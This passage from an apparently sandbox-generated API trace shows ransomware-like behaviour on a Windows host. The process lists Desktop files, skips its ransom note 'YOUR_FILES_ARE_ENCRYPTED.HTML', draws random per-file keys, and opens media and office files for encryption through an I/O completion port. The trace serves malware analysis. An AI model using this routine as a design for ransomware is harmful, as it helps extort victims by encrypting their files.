param_1="A2") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="3D") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D6") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="24") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4A") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0E") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="E7") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="10") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A5") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="85") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="70") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B1") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="29") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D6") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AD") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A5") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="76") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1D") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="01") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="59") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="2D") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="17") returned 2 [0165.907] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" [0165.907] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.907] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.907] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8181290, ftCreationTime.dwHighDateTime=0x1d7dbc3, ftLastAccessTime.dwLowDateTime=0x8930ee00, ftLastAccessTime.dwHighDateTime=0x1d7e11f, ftLastWriteTime.dwLowDateTime=0x8930ee00, ftLastWriteTime.dwHighDateTime=0x1d7e11f, nFileSizeHigh=0x0, nFileSizeLow=0x12c99, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="jYoN.swf", cAlternateFileName="")) returned 1 [0165.907] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\jYoN.swf") returned 48 [0165.908] lstrcmpW (lpString1="jYoN.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.908] PathFindExtensionW (pszPath="jYoN.swf") returned=".swf" [0165.908] lstrlenW (lpString=".swf") returned 4 [0165.908] PathFindExtensionW (pszPath="jYoN.swf") returned=".swf" [0165.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd00210a0, ftCreationTime.dwHighDateTime=0x1d7e699, ftLastAccessTime.dwLowDateTime=0x4c668350, ftLastAccessTime.dwHighDateTime=0x1d7e722, ftLastWriteTime.dwLowDateTime=0x4c668350, ftLastWriteTime.dwHighDateTime=0x1d7e722, nFileSizeHigh=0x0, nFileSizeLow=0x1c9e, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="oHGOlTifeSET7B2 HWLe.flv", cAlternateFileName="OHGOLT~1.FLV")) returned 1 [0165.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv") returned 64 [0165.908] lstrcmpW (lpString1="oHGOlTifeSET7B2 HWLe.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.908] PathFindExtensionW (pszPath="oHGOlTifeSET7B2 HWLe.flv") returned=".flv" [0165.908] lstrlenW (lpString=".flv") returned 4 [0165.908] PathFindExtensionW (pszPath="oHGOlTifeSET7B2 HWLe.flv") returned=".flv" [0165.908] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\ohgoltifeset7b2 hwle.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.918] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=7326) returned 1 [0165.918] GetProcessHeap () returned 0x270000 [0165.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.919] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="69") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A6") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="13") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="59") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6A") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A4") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="22") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F3") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="80") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B8") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6E") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F1") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="15") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="09") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="3E") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="38") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="96") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="04") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="10") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="51") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DF") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="51") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="25") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9C") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C7") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="89") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BF") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E5") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0B") returned 2 [0165.921] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" [0165.921] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.921] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10600, ftCreationTime.dwHighDateTime=0x1d7d866, ftLastAccessTime.dwLowDateTime=0xe273c790, ftLastAccessTime.dwHighDateTime=0x1d7dac5, ftLastWriteTime.dwLowDateTime=0xe273c790, ftLastWriteTime.dwHighDateTime=0x1d7dac5, nFileSizeHigh=0x0, nFileSizeLow=0x12035, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="ra1fSL6OZqTy.bmp", cAlternateFileName="RA1FSL~1.BMP")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\ra1fSL6OZqTy.bmp") returned 56 [0165.922] lstrcmpW (lpString1="ra1fSL6OZqTy.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="ra1fSL6OZqTy.bmp") returned=".bmp" [0165.922] lstrlenW (lpString=".bmp") returned 4 [0165.922] PathFindExtensionW (pszPath="ra1fSL6OZqTy.bmp") returned=".bmp" [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70030d0, ftCreationTime.dwHighDateTime=0x1d7de23, ftLastAccessTime.dwLowDateTime=0x6ebfde70, ftLastAccessTime.dwHighDateTime=0x1d7dfe2, ftLastWriteTime.dwLowDateTime=0x6ebfde70, ftLastWriteTime.dwHighDateTime=0x1d7dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x14447, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="S2bdrGwi.bmp", cAlternateFileName="")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\S2bdrGwi.bmp") returned 52 [0165.922] lstrcmpW (lpString1="S2bdrGwi.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="S2bdrGwi.bmp") returned=".bmp" [0165.922] lstrlenW (lpString=".bmp") returned 4 [0165.922] PathFindExtensionW (pszPath="S2bdrGwi.bmp") returned=".bmp" [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1beab810, ftCreationTime.dwHighDateTime=0x1d7e1d5, ftLastAccessTime.dwLowDateTime=0xef9fafc0, ftLastAccessTime.dwHighDateTime=0x1d7e38e, ftLastWriteTime.dwLowDateTime=0xef9fafc0, ftLastWriteTime.dwHighDateTime=0x1d7e38e, nFileSizeHigh=0x0, nFileSizeLow=0xacc2, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="SaH.png", cAlternateFileName="")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png") returned 47 [0165.922] lstrcmpW (lpString1="SaH.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="SaH.png") returned=".png" [0165.922] lstrlenW (lpString=".png") returned 4 [0165.923] PathFindExtensionW (pszPath="SaH.png") returned=".png" [0165.923] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\sah.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.012] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=44226) returned 1 [0166.012] GetProcessHeap () returned 0x270000 [0166.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.013] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CB") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4B") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FF") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="76") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="7D") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FE") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="58") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="41") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3D") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B1") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="74") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D2") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="02") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FF") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="6F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C0") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="89") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="53") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FA") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="85") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="44") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="7A") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FF") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="12") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B5") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6E") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="8F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="5A") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="AD") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4E") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="79") returned 2 [0166.015] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" [0166.015] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.015] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad310f0, ftCreationTime.dwHighDateTime=0x1d7d8af, ftLastAccessTime.dwLowDateTime=0xe2c47650, ftLastAccessTime.dwHighDateTime=0x1d7e3de, ftLastWriteTime.dwLowDateTime=0xe2c47650, ftLastWriteTime.dwHighDateTime=0x1d7e3de, nFileSizeHigh=0x0, nFileSizeLow=0x204f, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="siEyKMkaJ2X9IA-.jpg", cAlternateFileName="SIEYKM~1.JPG")) returned 1 [0166.030] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg") returned 59 [0166.030] lstrcmpW (lpString1="siEyKMkaJ2X9IA-.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.030] PathFindExtensionW (pszPath="siEyKMkaJ2X9IA-.jpg") returned=".jpg" [0166.030] lstrlenW (lpString=".jpg") returned 4 [0166.030] PathFindExtensionW (pszPath="siEyKMkaJ2X9IA-.jpg") returned=".jpg" [0166.030] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\sieykmkaj2x9ia-.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.031] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=8271) returned 1 [0166.031] GetProcessHeap () returned 0x270000 [0166.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.034] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0166.034] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="5A") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F7") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C6") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="64") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="AF") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="82") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="93") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EC") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="ED") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6B") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="28") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3C") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="31") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B8") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CB") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D1") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="66") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="27") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="73") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="46") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="30") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="91") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7C") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9F") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4E") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C4") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9A") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="19") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="34") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="75") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="17") returned 2 [0166.036] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" [0166.036] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.036] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.044] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9538dd0, ftCreationTime.dwHighDateTime=0x1d7e144, ftLastAccessTime.dwLowDateTime=0x7ec02a0, ftLastAccessTime.dwHighDateTime=0x1d7e1ef, ftLastWriteTime.dwLowDateTime=0x7ec02a0, ftLastWriteTime.dwHighDateTime=0x1d7e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x14cb8, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="zn7l9.xlsx", cAlternateFileName="ZN7L9~1.XLS")) returned 1 [0166.044] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx") returned 50 [0166.044] lstrcmpW (lpString1="zn7l9.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.044] PathFindExtensionW (pszPath="zn7l9.xlsx") returned=".xlsx" [0166.045] lstrlenW (lpString=".xlsx") returned 5 [0166.045] PathFindExtensionW (pszPath="zn7l9.xlsx") returned=".xlsx" [0166.045] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\zn7l9.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.045] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=85176) returned 1 [0166.045] GetProcessHeap () returned 0x270000 [0166.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.046] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="8A") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="58") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="94") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="09") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9C") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DD") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="29") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F5") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="85") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1D") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="E0") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="40") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5B") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="F7") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A7") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="50") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="20") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="EF") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C4") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="95") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="79") returned 2 [0166.047] 